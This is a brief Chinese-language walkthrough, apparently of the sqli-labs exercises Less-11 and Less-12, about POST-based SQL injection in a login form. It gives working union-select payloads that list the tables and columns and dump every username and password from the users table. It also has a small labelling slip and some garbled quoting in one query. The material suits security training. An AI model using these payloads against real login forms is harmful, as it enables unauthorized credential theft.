这关是post注入的世界，post注入就是表单中填好数据通常会被送到服务器，然后由服务器将其发送到它要去的地方（比如，送到一个服务器网关程序中，然后由这个程序对其进行处理）。

不显示东西，那么加引号等一切简单的注入，发现他的sql查询语句是 select username,password from users where username='inputuname' and password='inputpass'

利用万能密码 (列举一些)

可以看出爆出来了数据，然后利用order by ，union select 可以进行简单的注入，可观察到有两个字段，接下来看图吧

uname=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=123&submit=Submit

uname=1' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() #&passwd=123&submit=Submit

 

uname=1' union select group_concat(username),group_concat(password) from users#&passwd=123&submit=Submit

 

Less-12和Less-12不同的就是他的后台sql语句是select username,password from users where username=("inputuname") and password="(inputpass"),其他的和LEss-11一样，开启你的操作吧！